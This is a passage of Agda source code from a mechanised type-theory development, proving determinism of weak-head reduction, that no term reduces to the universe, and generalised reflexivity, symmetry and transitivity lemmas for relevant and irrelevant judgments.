x) Πₙ = PE.refl whnfRedTerm (id x) ∃ₙ = PE.refl whnfRedTerm (id x) ℕₙ = PE.refl whnfRedTerm (id x) Emptyₙ = PE.refl whnfRedTerm (id x) lamₙ = PE.refl whnfRedTerm (id x) zeroₙ = PE.refl whnfRedTerm (id x) sucₙ = PE.refl whnfRedTerm (id x) (ne x₁) = PE.refl whnfRedTerm (conv x x₁ ⇨ d) w = ⊥-elim (whnfRedTerm x w) whnfRedTerm (x ⇨ d) (ne x₁) = ⊥-elim (neRedTerm x x₁) whnfRed : ∀ {Γ A B r} (d : Γ ⊢ A ⇒* B ^ r) (w : Whnf A) → A PE.≡ B whnfRed* (id x) w = PE.refl whnfRed* (x ⇨ d) w = ⊥-elim (whnfRed x w) -- Whr is deterministic -- somehow the cases (cast-Π, cast-Π) and (Id-U-ΠΠ, Id-U-ΠΠ) fail if -- we do not introduce a dummy relevance rA'. This is why we need the two -- auxiliary functions. whrDetTerm-aux1 : ∀{Γ t u F lF A A' rA lA lB rA' l B B' e f} → (d : t PE.≡ cast l (Π A ^ rA ° lA ▹ B ° lB ° l) (Π A' ^ rA' ° lA ▹ B' ° lB ° l) e f) → (d′ : Γ ⊢ t ⇒ u ∷ F ^ lF) → (lam A' ▹ (let a = cast l (wk1 A') (wk1 A) (Idsym (Univ rA l) (wk1 A) (wk1 A') (fst (wk1 e))) (var 0) in cast l (B [ a ]↑) B' ((snd (wk1 e)) ∘ (var 0) ^ ¹) ((wk1 f) ∘ a ^ l)) ^ l) PE.≡ u whrDetTerm-aux1 d (conv d' x) = whrDetTerm-aux1 d d' whrDetTerm-aux1 PE.refl (cast-subst d' x x₁ x₂) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm-aux1 PE.refl (cast-Π-subst x x₁ d' x₂ x₃) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm-aux1 PE.refl (cast-Π x x₁ x₂ x₃ x₄ x₅) = PE.refl whrDetTerm-aux2 : ∀{Γ t u F lF A rA B A' rA' B'} → (rA≡rA' : rA PE.≡ rA') → (d : t PE.≡ Id (U ⁰) (Π A ^ rA ° ⁰ ▹ B ° ⁰ ° ⁰) (Π A' ^ rA' ° ⁰ ▹ B' ° ⁰ ° ⁰)) → (d' : Γ ⊢ t ⇒ u ∷ F ^ lF) → (∃ (Id (Univ rA ⁰) A A') ▹ (Π (wk1 A') ^ rA ° ⁰ ▹ Id (U ⁰) ((wk (lift (step id)) B) [ cast ⁰ (wk1 (wk1 A')) (wk1 (wk1 A)) (Idsym (Univ rA ⁰) (wk1 (wk1 A)) (wk1 (wk1 A')) (var 1)) (var 0) ]↑) (wk (lift (step id)) B') ° ¹ ° ¹ ) ) PE.≡ u whrDetTerm-aux2 eq d (conv d' x) = whrDetTerm-aux2 eq d d' whrDetTerm-aux2 _ PE.refl (Id-subst d' x x₁) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm-aux2 _ PE.refl (Id-U-subst d' x) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm-aux2 _ PE.refl (Id-U-Π-subst x x₁ d') = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm-aux2 _ PE.refl (Id-U-ΠΠ x x₁ x₂ x₃) = PE.refl whrDetTerm-aux2 PE.refl PE.refl (Id-U-ΠΠ!% eq A B A' B') = ⊥-elim (eq PE.refl) whrDetTerm : ∀{Γ t u A l u′ A′ l′} (d : Γ ⊢ t ⇒ u ∷ A ^ l) (d′ : Γ ⊢ t ⇒ u′ ∷ A′ ^ l′) → u PE.≡ u′ whrDet : ∀{Γ A B B′ r r'} (d : Γ ⊢ A ⇒ B ^ r) (d′ : Γ ⊢ A ⇒ B′ ^ r') → B PE.≡ B′ whrDetTerm (conv d x) d′ = whrDetTerm d d′ whrDetTerm (app-subst d x) (app-subst d′ x₁) rewrite whrDetTerm d d′ = PE.refl whrDetTerm (app-subst d x) (β-red _ _ x₁ x₂ x₃) = ⊥-elim (whnfRedTerm d lamₙ) whrDetTerm (β-red _ _ x x₁ x₂) (app-subst d' x₃) = ⊥-elim (whnfRedTerm d' lamₙ) whrDetTerm (β-red _ _ x x₁ x₂) (β-red _ _ x₃ x₄ x₅) = PE.refl whrDetTerm (natrec-subst x x₁ x₂ d) (natrec-subst x₃ x₄ x₅ d') rewrite whrDetTerm d d' = PE.refl whrDetTerm (natrec-subst x x₁ x₂ d) (natrec-zero x₃ x₄ x₅) = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (natrec-subst x x₁ x₂ d) (natrec-suc x₃ x₄ x₅ x₆) = ⊥-elim (whnfRedTerm d sucₙ) whrDetTerm (natrec-zero x x₁ x₂) (natrec-subst x₃ x₄ x₅ d') = ⊥-elim (whnfRedTerm d' zeroₙ) whrDetTerm (natrec-zero x x₁ x₂) (natrec-zero x₃ x₄ x₅) = PE.refl whrDetTerm (natrec-suc x x₁ x₂ x₃) (natrec-subst x₄ x₅ x₆ d') = ⊥-elim (whnfRedTerm d' sucₙ) whrDetTerm (natrec-suc x x₁ x₂ x₃) (natrec-suc x₄ x₅ x₆ x₇) = PE.refl whrDetTerm (Id-subst d x x₁) (Id-subst d' x₂ x₃) rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-subst d x x₁) (Id-ℕ-subst d' x₂) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-ℕ-0-subst d') = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-ℕ-S-subst x₂ d') = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-U-subst d' x₂) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-U-ℕ-subst d') = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-U-Π-subst x₂ x₃ d') = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-Π _ _ x₂ x₃ x₄ x₅) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-subst d x x₁) (Id-ℕ-00 x₂) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-ℕ-SS x₂ x₃) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-U-ΠΠ x₂ x₃ x₄ x₅) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-U-ℕℕ x₂) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-SProp x₂ x₃) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-ℕ-0S x₂) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-ℕ-S0 x₂) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-U-ℕΠ x₂ x₃) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-U-Πℕ x₂ x₃) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-U-ΠΠ!% x₂ x₃ x₄ x₅ x₆) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-ℕ-subst d x) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-subst d' x₁) rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-0-subst d') = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-S-subst x₁ d') = ⊥-elim (whnfRedTerm d sucₙ) whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-00 x₁) = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-SS x₁ x₂) = ⊥-elim (whnfRedTerm d sucₙ) whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-0S x₁) = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-S0 x₁) = ⊥-elim (whnfRedTerm d sucₙ) whrDetTerm (Id-ℕ-0-subst d) (Id-subst d' x x₁) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-0-subst d) (Id-ℕ-subst d' x) = ⊥-elim (whnfRedTerm d' zeroₙ) whrDetTerm (Id-ℕ-0-subst d) (Id-ℕ-0-subst d') rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-ℕ-0-subst d) (Id-ℕ-00 x) = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (Id-ℕ-0-subst d) (Id-ℕ-0S x) = ⊥-elim (whnfRedTerm d sucₙ) whrDetTerm (Id-ℕ-S-subst x d) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-S-subst x d) (Id-ℕ-subst d' x₁) = ⊥-elim (whnfRedTerm d' sucₙ) whrDetTerm (Id-ℕ-S-subst x d) (Id-ℕ-S-subst x₁ d') rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-ℕ-S-subst x d) (Id-ℕ-SS x₁ x₂) = ⊥-elim (whnfRedTerm d sucₙ) whrDetTerm (Id-ℕ-S-subst x d) (Id-ℕ-S0 x₁) = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (Id-U-subst d x) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-subst d x) (Id-U-subst d' x₁) rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-U-subst d x) (Id-U-ℕ-subst d') = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-U-subst d x) (Id-U-Π-subst x₁ x₂ d') = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-U-subst d x) (Id-U-ΠΠ x₁ x₂ x₃ x₄) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-U-subst d x) (Id-U-ℕℕ x₁) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-U-subst d x) (Id-U-ℕΠ x₁ x₂) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-U-subst d x) (Id-U-Πℕ x₁ x₂) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-U-subst d x) (Id-U-ΠΠ!% x₁ x₂ x₃ x₄ x₅) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-U-ℕ-subst d) (Id-subst d' x x₁) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-ℕ-subst d) (Id-U-subst d' x) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-U-ℕ-subst d) (Id-U-ℕ-subst d') rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-U-ℕ-subst d) (Id-U-ℕℕ x) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-U-ℕ-subst d) (Id-U-ℕΠ x x₁) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-U-Π-subst x x₁ d) (Id-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-Π-subst x x₁ d) (Id-U-subst d' x₂) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (Id-U-Π-subst x x₁ d) (Id-U-Π-subst x₂ x₃ d') rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-U-Π-subst x x₁ d) (Id-U-ΠΠ x₂ x₃ x₄ x₅) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-U-Π-subst x x₁ d) (Id-U-Πℕ x₂ x₃) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-U-Π-subst x x₁ d) (Id-U-ΠΠ!% x₂ x₃ x₄ x₅ x₆) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-Π _ _ x x₁ x₂ x₃) (Id-subst d' x₄ x₅) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (Id-Π _ _ x x₁ x₂ x₃) (Id-Π _ _ x₄ x₅ x₆ x₇) = PE.refl whrDetTerm (Id-ℕ-00 x) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-00 x) (Id-ℕ-subst d' x₁) = ⊥-elim (whnfRedTerm d' zeroₙ) whrDetTerm (Id-ℕ-00 x) (Id-ℕ-0-subst d') = ⊥-elim (whnfRedTerm d' zeroₙ) whrDetTerm (Id-ℕ-00 x) (Id-ℕ-00 x₁) = PE.refl whrDetTerm (Id-ℕ-SS x x₁) (Id-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-SS x x₁) (Id-ℕ-subst d' x₂) = ⊥-elim (whnfRedTerm d' sucₙ) whrDetTerm (Id-ℕ-SS x x₁) (Id-ℕ-S-subst x₂ d') = ⊥-elim (whnfRedTerm d' sucₙ) whrDetTerm (Id-ℕ-SS x x₁) (Id-ℕ-SS x₂ x₃) = PE.refl whrDetTerm (Id-U-ΠΠ x x₁ x₂ x₃) d' = whrDetTerm-aux2 PE.refl PE.refl d' whrDetTerm (Id-U-ℕℕ x) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-ℕℕ x) (Id-U-subst d' x₁) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-U-ℕℕ x) (Id-U-ℕ-subst d') = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-U-ℕℕ x) (Id-U-ℕℕ x₁) = PE.refl whrDetTerm (Id-SProp x x₁) (Id-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-SProp x x₁) (Id-SProp x₂ x₃) = PE.refl whrDetTerm (Id-ℕ-0S x) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-0S x) (Id-ℕ-subst d' x₁) = ⊥-elim (whnfRedTerm d' zeroₙ) whrDetTerm (Id-ℕ-0S x) (Id-ℕ-0-subst d') = ⊥-elim (whnfRedTerm d' sucₙ) whrDetTerm (Id-ℕ-0S x) (Id-ℕ-0S x₁) = PE.refl whrDetTerm (Id-ℕ-S0 x) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-S0 x) (Id-ℕ-subst d' x₁) = ⊥-elim (whnfRedTerm d' sucₙ) whrDetTerm (Id-ℕ-S0 x) (Id-ℕ-S-subst x₁ d') = ⊥-elim (whnfRedTerm d' zeroₙ) whrDetTerm (Id-ℕ-S0 x) (Id-ℕ-S0 x₁) = PE.refl whrDetTerm (Id-U-ℕΠ x x₁) (Id-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-ℕΠ x x₁) (Id-U-subst d' x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-U-ℕΠ x x₁) (Id-U-ℕ-subst d') = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (Id-U-ℕΠ x x₁) (Id-U-ℕΠ x₂ x₃) = PE.refl whrDetTerm (Id-U-Πℕ x x₁) (Id-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-Πℕ x x₁) (Id-U-subst d' x₂) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (Id-U-Πℕ x x₁) (Id-U-Π-subst x₂ x₃ d') = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-U-Πℕ x x₁) (Id-U-Πℕ x₂ x₃) = PE.refl whrDetTerm (Id-U-ΠΠ!% eq A B A' B') (Id-subst d' x x₁) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-ΠΠ!% eq A B A' B') (Id-U-subst d' x) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (Id-U-ΠΠ!% eq A B A' B') (Id-U-Π-subst x x₁ d') = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (Id-U-ΠΠ!% eq A B A' B') (Id-U-ΠΠ x x₁ x₂ x₃) = ⊥-elim (eq PE.refl) whrDetTerm (Id-U-ΠΠ!% eq A B A' B') (Id-U-ΠΠ!% x x₁ x₂ x₃ x₄) = PE.refl whrDetTerm (cast-subst d x x₁ x₂) (cast-subst d' x₃ x₄ x₅) rewrite whrDetTerm d d' = PE.refl whrDetTerm (cast-subst d x x₁ x₂) (cast-ℕ-subst d' x₃ x₄) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-subst d x x₁ x₂) (cast-Π-subst x₃ x₄ d' x₅ x₆) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (cast-subst d x x₁ x₂) (cast-Π x₃ x₄ x₅ x₆ x₇ x₈) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (cast-subst d x x₁ x₂) (cast-ℕ-0 x₃) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-subst d x x₁ x₂) (cast-ℕ-S x₃ x₄) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-ℕ-subst d x x₁) (cast-subst d' x₂ x₃ x₄) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-subst d x x₁) (cast-ℕ-subst d' x₂ x₃) rewrite whrDetTerm d d' = PE.refl whrDetTerm (cast-ℕ-subst d x x₁) (cast-ℕ-0 x₂) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-ℕ-subst d x x₁) (cast-ℕ-S x₂ x₃) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-Π-subst x x₁ d x₂ x₃) (cast-subst d' x₄ x₅ x₆) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (cast-Π-subst x x₁ d x₂ x₃) (cast-Π-subst x₄ x₅ d' x₆ x₇) rewrite whrDetTerm d d' = PE.refl whrDetTerm (cast-Π-subst x x₁ d x₂ x₃) (cast-Π x₄ x₅ x₆ x₇ x₈ x₉) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (cast-Π x x₁ x₂ x₃ x₄ x₅) d' = whrDetTerm-aux1 (PE.refl) d' whrDetTerm (cast-ℕ-0 x) (cast-subst d' x₁ x₂ x₃) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-0 x) (cast-ℕ-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-0 x) (cast-ℕ-0 x₁) = PE.refl whrDetTerm (cast-ℕ-S x x₁) (cast-subst d' x₂ x₃ x₄) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-S x x₁) (cast-ℕ-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-S x x₁) (cast-ℕ-S x₂ x₃) = PE.refl whrDetTerm (cast-ℕ-cong x x₁) (cast-subst d' x₂ x₃ x₄) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-cong x x₁) (cast-ℕ-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-cong x x₁) (cast-ℕ-cong x₂ x₃) rewrite whrDetTerm x₁ x₃ = PE.refl -- whrDetTerm (cast-subst d x x₁ x₂) (cast-ℕ-cong x₃ d′) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-ℕ-subst d x x₁) (cast-ℕ-cong x₂ d′) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-ℕ-0 x) (cast-ℕ-cong x₁ d′) = ⊥-elim (whnfRedTerm d′ zeroₙ) whrDetTerm (cast-ℕ-S x x₁) (cast-ℕ-cong x₂ d′) = ⊥-elim (whnfRedTerm d′ sucₙ) whrDetTerm (cast-ℕ-cong x d) (cast-ℕ-0 x₁) = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (cast-ℕ-cong x d) (cast-ℕ-S x₁ x₂) = ⊥-elim (whnfRedTerm d sucₙ) {-# CATCHALL #-} whrDetTerm d (conv d′ x₁) = whrDetTerm d d′ whrDet (univ x) (univ x₁) = whrDetTerm x x₁ whrDet↘Term : ∀{Γ t u A l u′} (d : Γ ⊢ t ↘ u ∷ A ^ l) (d′ : Γ ⊢ t ⇒* u′ ∷ A ^ l) → Γ ⊢ u′ ⇒* u ∷ A ^ l whrDet↘Term (proj₁ , proj₂) (id x) = proj₁ whrDet↘Term (id x , proj₂) (x₁ ⇨ d′) = ⊥-elim (whnfRedTerm x₁ proj₂) whrDet↘Term (x ⇨ proj₁ , proj₂) (x₁ ⇨ d′) = whrDet↘Term (PE.subst (λ x₂ → _ ⊢ x₂ ↘ _ ∷ _ ^ _) (whrDetTerm x x₁) (proj₁ , proj₂)) d′ whrDetTerm : ∀{Γ t u A A' l u′ } (d : Γ ⊢ t ↘ u ∷ A ^ l) (d′ : Γ ⊢ t ↘ u′ ∷ A' ^ l) → u PE.≡ u′ whrDetTerm (id x , proj₂) (id x₁ , proj₄) = PE.refl whrDetTerm (id x , proj₂) (x₁ ⇨ proj₃ , proj₄) = ⊥-elim (whnfRedTerm x₁ proj₂) whrDetTerm (x ⇨ proj₁ , proj₂) (id x₁ , proj₄) = ⊥-elim (whnfRedTerm x proj₄) whrDetTerm (x ⇨ proj₁ , proj₂) (x₁ ⇨ proj₃ , proj₄) = whrDetTerm (proj₁ , proj₂) (PE.subst (λ x₂ → _ ⊢ x₂ ↘ _ ∷ _ ^ _) (whrDetTerm x₁ x) (proj₃ , proj₄)) whrDet* : ∀{Γ A B B′ r r'} (d : Γ ⊢ A ↘ B ^ r) (d′ : Γ ⊢ A ↘ B′ ^ r') → B PE.≡ B′ whrDet* (id x , proj₂) (id x₁ , proj₄) = PE.refl whrDet* (id x , proj₂) (x₁ ⇨ proj₃ , proj₄) = ⊥-elim (whnfRed x₁ proj₂) whrDet* (x ⇨ proj₁ , proj₂) (id x₁ , proj₄) = ⊥-elim (whnfRed x proj₄) whrDet* (A⇒A′ ⇨ A′⇒B , whnfB) (A⇒A″ ⇨ A″⇒B′ , whnfB′) = whrDet* (A′⇒B , whnfB) (PE.subst (λ x → _ ⊢ x ↘ _ ^ _ ) (whrDet A⇒A″ A⇒A′) (A″⇒B′ , whnfB′)) -- Identity of syntactic reduction idRed:: : ∀ {Γ A r} → Γ ⊢ A ^ r → Γ ⊢ A :⇒: A ^ r idRed:: A = [[ A , A , id A ]] idRedTerm:: : ∀ {Γ A l t} → Γ ⊢ t ∷ A ^ [ ! , l ] → Γ ⊢ t :⇒: t ∷ A ^ l idRedTerm:: t = [[ t , t , id t ]] -- U cannot be a term UnotInA : ∀ {A Γ r r'} → Γ ⊢ (Univ r ¹) ∷ A ^ r' → ⊥ UnotInA (conv U∷U x) = UnotInA U∷U UnotInA[t] : ∀ {A B t a Γ r r' r'' r'''} → t [ a ] PE.≡ (Univ r ¹) → Γ ⊢ a ∷ A ^ r' → Γ ∙ A ^ r'' ⊢ t ∷ B ^ r''' → ⊥ UnotInA[t] () x₁ (univ 0<1 x₂) UnotInA[t] () x₁ (ℕⱼ x₂) UnotInA[t] () x₁ (Emptyⱼ x₂) UnotInA[t] () x₁ (Πⱼ _ ▹ _ ▹ x₂ ▹ x₃) UnotInA[t] x₁ x₂ (var x₃ here) rewrite x₁ = UnotInA x₂ UnotInA[t] () x₂ (var x₃ (there x₄)) UnotInA[t] () x₁ (lamⱼ _ _ x₂ x₃) UnotInA[t] () x₁ (x₂ ∘ⱼ x₃) UnotInA[t] () x₁ (zeroⱼ x₂) UnotInA[t] () x₁ (sucⱼ x₂) UnotInA[t] () x₁ (natrecⱼ x₂ x₃ x₄ x₅) UnotInA[t] () x₁ (Emptyrecⱼ x₂ x₃) UnotInA[t] x x₁ (conv x₂ x₃) = UnotInA[t] x x₁ x₂ redUTerm′ : ∀ {A B U′ l Γ r} → U′ PE.≡ (Univ r ¹) → Γ ⊢ A ⇒ U′ ∷ B ^ l → ⊥ redUTerm′ U′≡U (conv A⇒U x) = redUTerm′ U′≡U A⇒U redUTerm′ () (app-subst A⇒U x) redUTerm′ U′≡U (β-red _ _ x x₁ x₂) = UnotInA[t] U′≡U x₂ x₁ redUTerm′ () (natrec-subst x x₁ x₂ A⇒U) redUTerm′ U′≡U (natrec-zero x x₁ x₂) rewrite U′≡U = UnotInA x₁ redUTerm′ () (natrec-suc x x₁ x₂ x₃) redUTerm : ∀ {A B l Γ r} → Γ ⊢ A ⇒ (Univ r ¹) ∷ B ^ l → ⊥ redUTerm (id x) = UnotInA x redUTerm (x ⇨ A⇒U) = redUTerm A⇒U -- Nothing reduces to U redU : ∀ {A Γ r l } → Γ ⊢ A ⇒ (Univ r ¹) ^ [ ! , l ] → ⊥ redU (univ x) = redUTerm′ PE.refl x redU* : ∀ {A Γ r l } → Γ ⊢ A ⇒* (Univ r ¹) ^ [ ! , l ] → A PE.≡ (Univ r ¹) redU* (id x) = PE.refl redU* (x ⇨ A⇒U) rewrite redU A⇒U = ⊥-elim (redU x) -- convertibility for irrelevant terms implies typing typeInversion : ∀ {t u A l Γ} → Γ ⊢ t ≡ u ∷ A ^ [ % , l ] → Γ ⊢ t ∷ A ^ [ % , l ] typeInversion (conv X x) = let d = typeInversion X in conv d x typeInversion (proof-irrelevance x x₁) = x -- general version of reflexivity, symmetry and transitivity genRefl : ∀ {A Γ t r l } → Γ ⊢ t ∷ A ^ [ r , l ] → Γ ⊢ t ≡ t ∷ A ^ [ r , l ] genRefl {r = !} d = refl d genRefl {r = %} d = proof-irrelevance d d -- Judgmental instance of the equality relation genSym : ∀ {k l A Γ r lA } → Γ ⊢ k ≡ l ∷ A ^ [ r , lA ] → Γ ⊢ l ≡ k ∷ A ^ [ r , lA ] genSym {r = !} = sym genSym {r = %} (proof-irrelevance x x₁) = proof-irrelevance x₁ x genSym {r = %} (conv x x₁) = conv (genSym x) x₁ genTrans : ∀ {k l m A r Γ lA } → Γ ⊢ k ≡ l ∷ A ^ [ r , lA ] → Γ ⊢ l ≡ m ∷ A ^ [ r , lA ] → Γ ⊢ k ≡ m ∷ A ^ [ r , lA ] genTrans {r = !} = trans genTrans {r = %} (conv X x) (conv Y x₁) = conv (genTrans X (conv Y (trans x₁ (sym x)))) x genTrans {r = %} (conv X x) (proof-irrelevance x₁ x₂) = proof-irrelevance (conv (typeInversion X) x) x₂ genTrans {r = %} (proof-irrelevance x x₁) (conv Y x₂) = proof-irrelevance x (conv (typeInversion (genSym Y)) x₂) genTrans {r = %} (proof-irrelevance x x₁) (proof-irrelevance x₂ x₃) = proof-irrelevance x x₃ genVar : ∀ {x A Γ r l } → Γ ⊢ var x ∷ A ^ [ r , l ] → Γ ⊢ var x ≡ var x ∷ A ^ [ r , l ] genVar {r = !} = refl genVar {r = %} d = proof-irrelevance d d toLevelInj : ∀ {l₁ l₁′ : TypeLevel} {l<₁ : l₁′ <∞ l₁} {l₂ l₂′ : TypeLevel} {l<₂ : l₂′ <∞ l₂} → toLevel l₁′ PE.≡ toLevel l₂′ → l₁′ PE.≡ l₂′ toLevelInj {.(ι ¹)} {.(ι ⁰)} {emb<} {.(ι ¹)} {.(ι ⁰)} {emb<} e = PE.refl toLevelInj {.∞} {.(ι ¹)} {∞<} {.(ι ¹)} {.(ι ⁰)} {emb<} () toLevelInj {.∞} {.(ι ¹)} {∞<} {.∞} {.(ι ¹)} {∞<} e = PE.refl redSProp′ : ∀ {Γ A B l} (D : Γ ⊢ A ⇒ B ∷ SProp l ^ next l ) → Γ ⊢ A ⇒* B ^ [ % , ι l ] redSProp′ (id x) = id (univ x) redSProp′ (x ⇨ D) = univ x ⇨ redSProp′ D redSProp : ∀ {Γ A B l} (D : Γ ⊢ A :⇒: B ∷ SProp l ^ next l ) → Γ ⊢ A :⇒: B ^ [ % , ι l ] redSProp [[ ⊢t , ⊢u , d ]] = [[ (univ ⊢t) , (univ ⊢u) , redSProp′ d ]] un-univ : ∀ {A r Γ l} → Γ ⊢ A ^ [ r , ι l ] → Γ ⊢ A ∷ Univ r l ^ [ ! , next l ] un-univ (univ x) = x un-univ≡ : ∀ {A B r Γ l} → Γ ⊢ A ≡ B ^ [ r , ι l ] → Γ ⊢ A ≡ B ∷ Univ r l ^ [ ! , next l ] un-univ≡ (univ x) = x un-univ≡ (refl x) = refl (un-univ x) un-univ≡ (sym X) = sym (un-univ≡ X) un-univ≡ (trans X Y) = trans (un-univ≡ X) (un-univ≡ Y) univ-gen : ∀ {r Γ l} → (⊢Γ : ⊢ Γ) → Γ ⊢ Univ r l ^ [ ! , next l ] univ-gen {l = ⁰} ⊢Γ = univ (univ 0<1 ⊢Γ ) univ-gen {l = ¹} ⊢Γ = Uⱼ ⊢Γ un-univ⇒ : ∀ {l Γ A B r} → Γ ⊢ A ⇒ B ^ [ r , ι l ] → Γ ⊢ A ⇒ B ∷ Univ r l ^ next l un-univ⇒ (univ x) = x univ⇒* : ∀ {l Γ A B r} → Γ ⊢ A ⇒* B ∷ Univ r l ^ next l → Γ ⊢ A ⇒* B ^ [ r , ι l ] univ⇒* (id x) = id (univ x) univ⇒* (x ⇨ D) = univ x ⇨ univ⇒* D un-univ⇒* : ∀ {l Γ A B r} → Γ ⊢ A ⇒* B ^ [ r , ι l ] → Γ ⊢ A ⇒* B ∷ Univ r l ^ next l 